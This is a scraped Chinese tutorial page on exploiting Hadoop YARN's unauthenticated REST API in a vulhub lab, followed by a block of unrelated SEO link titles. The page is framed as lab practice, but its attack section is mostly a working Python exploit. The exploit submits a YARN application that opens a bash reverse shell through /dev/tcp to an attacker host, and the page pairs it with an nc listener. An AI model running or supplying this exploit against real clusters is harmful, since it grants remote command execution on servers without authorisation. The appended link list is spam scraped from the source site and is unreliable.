当前位置: 首页 > news >正文

网站热图分析外贸网站建设内容包括

网站热图分析,外贸网站建设内容包括,西咸新区新闻,搭建网站案例精粹数据库安全:Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完…

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub


第二步:切换到 hadoop 目录下

cd hadoop


第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

docker-compose up -d


第五步:访问  http:// (靶场 IP 地址):8088


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888// 设置 监听 端口为8888


第三步:编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成!")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

http://www.15wanjia.com/news/188228.html

相关文章:

  • 河北建设部官方网站黄冈市建设信息网站
  • ps制作网站效果图建设银行网站表单清理
  • 苏州网站建设集团crm管理系统的优缺点
  • 河源网站制作济南网络广播电视台
  • 河北网站建设哪家好与别人相比自己网站建设优势
  • 网站案例介绍泊头哪里建网站呢
  • 织梦手机网站wordpress 说明
  • 成都网站建设优秀公司wordpress内网无法访问
  • 网站建设需求调研表网站建设的基本流程规范
  • 营销网站规划的要点包括( )一键下载安装微信
  • 延边州网站建设手机版网站如何做
  • 深圳p2p网站建设wordpress文章按阅读次数排序
  • 越秀定制型网站建设护肤品 网站建设策划
  • 如何知道网站流量ico在线制作网站
  • 重庆网站服务器济南网站建设 刘彬彬
  • 重庆手机网站开发在线测评网站怎么做
  • 物流网站开题报告移动端响应式网站怎么做
  • 潍坊网站优化公司哪家好全国十大公关公司
  • 钓鱼网站搭建教程原创设计
  • 网站建设太金手指六六二九泉州最好的网站建设公司
  • html5学习网站做室内装修设计的网站
  • 网站可以做怀孕单吗用php做的企业网站作业
  • 邢台123最新消息苏州网站排名优化报价
  • wordpress仿站流程试列出网站开发建设的步骤
  • 免费做片头的网站库尔勒网站建设
  • 做网站UI工具太原高级seo主管
  • html家乡网站设计咸阳网站推广
  • 定制企业网站辽宁工程建设信息网网站
  • 简单免费制作手机网站做电台用啥什么网站
  • 济宁网站做网站运营有前途么